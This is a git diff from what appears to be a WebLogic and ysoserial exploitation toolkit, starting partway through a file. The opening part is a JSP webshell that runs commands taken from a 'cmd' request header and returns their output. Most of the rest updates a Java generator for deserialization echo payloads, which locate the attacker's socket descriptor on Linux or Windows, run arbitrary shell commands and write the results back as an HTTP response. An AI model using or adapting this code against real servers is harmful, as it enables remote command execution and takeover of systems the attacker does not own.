adapter.getClass().getMethod("getResponse").invoke(adapter); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(""); + } + }else{ + java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); + field.setAccessible(true); + Object obj = field.get(adapter); + obj = obj.getClass().getMethod("getServletRequest").invoke(obj); + String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd"); + + if(cmd != null && !cmd.isEmpty()){ + String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(""); + } + } +%> diff --git a/weblogic/code/weblogic-10.0.3.jsp b/weblogic/code/weblogic-10.0.3-deprecated.jsp similarity index 100% rename from weblogic/code/weblogic-10.0.3.jsp rename to weblogic/code/weblogic-10.0.3-deprecated.jsp diff --git a/weblogic/code/weblogic-12.1.3.jsp b/weblogic/code/weblogic-12.1.3-deprecated.jsp similarity index 100% rename from weblogic/code/weblogic-12.1.3.jsp rename to weblogic/code/weblogic-12.1.3-deprecated.jsp diff --git "a/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" "b/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" index 0717e08..a5e2269 100644 --- "a/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" +++ "b/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" @@ -7,7 +7,7 @@ public class DirectiveProcessor{ public static void main(String[] args) throws IOException { - System.out.println(process("directive:AutoFindRequestEcho")); + System.out.println(process("directive:WindowsEcho:whoami")); } public static String process(String command){ @@ -75,50 +75,61 @@ public static String linuxEcho(String command){ String cmd = command.split(":", 3)[2]; cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); - String code = "String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" + - " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command };\n" + - " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + - " java.util.List res1 = new java.util.ArrayList();\n" + - " String line = \"\";\n" + - " while ((line = br.readLine()) != null){\n" + - " res1.add(line);\n" + - " }\n" + - " br.close();\n" + + String code = " if(java.io.File.separator.equals(\"/\")){\n" + + " String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" + + " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" + + " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + + " java.util.List res1 = new java.util.ArrayList();\n" + + " String line = \"\";\n" + + " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" + + " res1.add(line);\n" + + " }\n" + + " br.close();\n" + "\n" + - " Thread.sleep((long)2000);\n" + + " try {\n" + + " Thread.sleep((long)2000);\n" + + " } catch (InterruptedException e) {\n" + + " //pass\n" + + " }\n" + "\n" + - " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" + - " cmd = new String[]{\"/bin/sh\", \"-c\", command };\n" + - " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + - " java.util.List res2 = new java.util.ArrayList();\n" + - " while ((line = br.readLine()) != null){\n" + - " res2.add(line);\n" + - " }\n" + - " br.close();\n" + - "\n" + - " int index = 0;\n" + - " int max = 0;\n" + - " for(int i = 0; i < res1.size(); i++){\n" + - " for(int j = 0; j < res2.size(); j++){\n" + - " if(((String)res2.get(j)).contains((String)res1.get(i))){\n" + - " String socketNo = ((String)res2.get(j)).split(\"\\\\s+\")[1].substring(8);\n" + + " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" + + " cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" + + " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + + " java.util.List res2 = new java.util.ArrayList();\n" + + " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" + + " res2.add(line);\n" + + " }\n" + + " br.close();\n" + + "\n" + + " int index = 0;\n" + + " int max = 0;\n" + + " for(int i = 0; i < res2.size(); i++){\n" + + " try{\n" + + " String socketNo = ((String)res2.get(i)).split(\"\\\\s+\")[1].substring(8);\n" + " socketNo = socketNo.substring(0, socketNo.length() - 1);\n" + - " if(Integer.parseInt(socketNo) > max) {\n" + - " max = Integer.parseInt(socketNo);\n" + - " index = j;\n" + + " for(int j = 0; j < res1.size(); j++){\n" + + " if(!socketNo.equals(res1.get(j))) continue;\n" + + "\n" + + " if(Integer.parseInt(socketNo) > max) {\n" + + " max = Integer.parseInt(socketNo);\n" + + " index = j;\n" + + " }\n" + + " break;\n" + " }\n" + + " }catch(Exception e){\n" + + " //pass\n" + " }\n" + " }\n" + - " }\n" + "\n" + - " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" + - " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" + - " c.setAccessible(true);\n" + - " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\" };\n" + - " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + - " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + - " java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" + - " os.write(result.getBytes());"; + " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" + + " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" + + " c.setAccessible(true);\n" + + " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\"};\n" + + " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + + " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + + " java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" + + " os.write(result.getBytes());\n" + + " }"; return code; } @@ -389,56 +400,52 @@ public static String windowsEcho(String command){ String cmd = command.split(":", 3)[2]; cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); - String code = " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" + - " field.setAccessible(true);\n" + + String code = " if(java.io.File.separator.equals(\"\\\\\")){\n" + + " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" + + " field.setAccessible(true);\n" + "\n" + - " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" + - " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" + - " method1.setAccessible(true);\n" + + " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" + + " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" + + " method1.setAccessible(true);\n" + "\n" + - " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" + - " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" + - " constructor2.setAccessible(true);\n" + + " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" + + " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" + + " constructor2.setAccessible(true);\n" + "\n" + - " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" + - " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" + - " constructor3.setAccessible(true);\n" + + " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" + + " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" + + " constructor3.setAccessible(true);\n" + "\n" + - " java.lang.reflect.Method write = clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" + - " write.setAccessible(true);\n" + + " java.lang.reflect.Method write = clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" + + " write.setAccessible(true);\n" + "\n" + - " java.net.InetSocketAddress remoteAddress = null;\n" + - " java.util.List list1 = new java.util.ArrayList();\n" + - " java.util.List list2 = new java.util.ArrayList();\n" + - " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" + - " for(int i = 0; i < 10000; i++){\n" + - " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + - " try{\n" + - " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + - " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + - " list1.add(new Integer(i));\n" + - " }catch(Exception e){}\n" + - " }\n" + + " java.net.InetSocketAddress remoteAddress = null;\n" + + " java.util.List list = new java.util.ArrayList();\n" + + " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" + + " for(int i = 0; i < 50000; i++){\n" + + " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + + " try{\n" + + " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + + " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + + " if(remoteAddress.toString().startsWith(\"/0:0:0:0:0:0:0:1\")) continue;\n" + + " list.add(new Integer(i));\n" + "\n" + - " Thread.sleep((long)2000);\n" + - " for(int i = 0; i < 10000; i++){\n" + - " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + - " try{\n" + - " remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + - " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + - " list2.add(new Integer(i));\n" + - " }catch(Exception e){}\n" + - " }\n" + + " }catch(Exception e){}\n" + + " }\n" + "\n" + - " list1.retainAll(list2);\n" + - " for(int i = 0; i < list1.size(); i++){\n" + - " try{\n" + - " field.set((Object)fileDescriptor, list1.get(i));\n" + - " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" + - " String res = new java.util.Scanner(Runtime.getRuntime().exec(\"" + cmd + "\").getInputStream()).useDelimiter(\"\\\\A\").next();\n" + - " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + - " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" + - " }catch (Exception e){}\n" + + " for(int i = list.size() - 1; i >= 0; i--){\n" + + " try{\n" + + " field.set((Object)fileDescriptor, list.get(i));\n" + + " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" + + " String[] cmd = new String[]{\"cmd\",\"/C\", \"" + cmd + "\"};\n" + + " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next().trim();\n" + + " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + (res.length()) + \"\\n\\n\" + res + \"\\n\\n\";\n" + + " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" + + " break;\n" + + " }catch (Exception e){\n" + + " //pass\n" + + " }\n" + + " }\n" + " }"; return code; }